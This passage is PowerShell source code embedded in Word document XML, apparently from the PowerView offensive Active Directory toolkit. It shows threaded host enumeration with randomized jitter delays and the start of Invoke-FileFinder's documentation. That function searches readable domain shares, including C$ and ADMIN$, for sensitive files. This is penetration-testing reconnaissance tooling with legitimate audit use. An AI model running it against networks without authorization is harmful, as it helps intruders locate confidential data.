    <w:p w14:paraId="1983B1D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C4A0CE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # kick off the threaded script block + arguments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDDA932" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0D4AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBF83F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10CF44FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A961E95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(-not $NoPing -and ($ComputerName.count -ne 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C202C51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # ping all hosts in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295118BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272EC123" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B41137" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620538FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D67D264" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF4509" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660823BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="614FEFB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Computer in $ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC0217" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BD9188E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Counter = $Counter + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FBE27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F7EAB59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # sleep for our semi-randomized interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59802C41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252E98ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07AD7160" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E328F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $CheckShareAccess, $ExcludedShares, $CheckAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA79BAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250BC657" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4BB91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495C79D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB614E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E90E79E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78128305" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="793942DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-FileFinder {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C6EF6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC0C06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC643CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="032418F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds sensitive files on the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADEA17C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69E5DF26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AEA220" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708E7FFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25D0E900" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A87619E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16B8C238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function finds the local domain name for a host using Get-NetDomain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF8D53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        queries the domain for all active machines with Get-NetComputer, grabs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD7EB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the readable shares for each server, and recursively searches every</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62534351" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        share for files with specific keywords in the name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4A5889" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        If a share list is passed, EVERY share is enumerated regardless of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52335F01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        other options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D07E09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="347FDC7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A6A3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="640ACD9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host array to enumerate, passable on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F4BB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67879399" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57364DAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="594E60FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of hostnames/IPs to search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB3814" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10D32844" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC79BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C973AF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host filter name to query AD for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE5133" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="003DFD34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527680A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33CF31A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB0E315" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304696E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B4D81C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ShareList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1778301F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78DAC8BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        List if \\HOST\shares to search through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C53CC54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35D2B26B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Terms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F138F1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C65EFA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Terms to search for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA7A26C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="330EF163" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OfficeDocs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4F28DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7ADFDEE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797759B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72B905C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FreshEXEs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1EECAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="206A4C71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Find .EXEs accessed within the last week.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2903493E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E1DA038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LastAccessTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5198763C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60FCB93B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return files with a LastAccessTime greater than this date value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5AF9AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F295B9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LastWriteTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC2985" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07C18F7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return files with a LastWriteTime greater than this date value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA5C6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DA83C94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER CreationTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28CD16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A509E3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Only return files with a CreationDate greater than this date value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D32416" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C1C33FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER IncludeC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21033C24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1426F2A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Include any C$ shares in recursive searching (default ignore).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353754F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26C299D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER IncludeAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1293887F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="40E83200" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Include any ADMIN$ shares in recursive searching (default ignore).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2F6E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0655D728" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ExcludeFolders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262BBC99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="76EF13B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Exclude folders from the search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD46763" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B8F3063" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ExcludeHidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3FFD44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24E3CF21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Exclude hidden files and folders from the search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528DEC05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29A45D26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER CheckWriteAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219652C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1EF232D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Switch. Only returns files the current user has write access to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C957C28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1DC8F5C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4188C42E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="36DAF519" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Output results to a specified csv output file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F99880" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A5C26DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoClobber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BC73F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3227A95C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Don't overwrite any existing output file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3698F06F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="244CAD24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoPing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9AF740" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="500C1C6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Don't ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAB7B0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C9CB2C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228395AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D11BA6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Delay between enumerating hosts, defaults to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C29EABA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F1E901B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B0792" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AAE2283" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Jitter for the host delay, defaults to +/- 0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156ED774" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="584C4B24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB814B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="42CBCC39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to query for machines, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F668678" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B417951" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D7FC74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DFCDAC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78623964" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B40B281" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0CDE66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="04BCB950" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
